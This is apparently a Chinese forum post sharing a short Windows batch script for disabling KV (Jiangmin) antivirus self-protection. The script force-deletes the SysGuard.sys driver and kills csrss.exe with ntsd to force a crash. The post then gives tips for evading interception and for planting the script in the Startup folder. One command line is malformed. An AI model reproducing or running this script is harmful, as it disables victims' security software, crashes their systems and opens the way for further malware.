批处理战KV主防

批处理战KV主防

今早起来一边早饭一边试验的。 代码见下：

@echo off

del %systemroot%\system32\drivers\SysGuard.sys /f /q /s

set app_name=csrss.exe

echo 查找进程%app_name%,准备死机...

(tasklist /nh findstr /i %app_name%) (goto dead)

:dead

ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多说了， 实验结果好像管用， 我用虚拟机和真实机都分别试验了下， 还不错。 直接点的批处理脚本， 如果转成EXE效果不保证了(没有实验)。 但是由于有关机回写， 必须强迫死机， 虽然重启后KV的变态进程守护不管用了(可以用任务管理器试试)， 但是在重启之前你还得把善后工作做好， 准备来日重生。 有几点得注意：

1、不能直接用批处理写注册表(虽然可以还原SSDT之后用API写， 但是不是我们追求的纯粹R3手段)

2、最好不要把bat放在EXE里， 因为运行时KV十有八九可以拦截到

3、最好的地方可能是启动文件夹， 或许还有些其他修改手段

的确是个很娱乐且没有什么实用价值的手段...大家可以娱乐下， 不过考虑到每个人的机子效果或许不同， 不用报有太大希望。

特别强调：KV08/09用户， 试验时一定要把C:\Windows\system32\drivers\SysGuard.sys拷贝个到其它地方备份， 如果本实验真的成功了， KV就实效了。 只有拷贝回去下次重启即可恢复， 或者重新安装。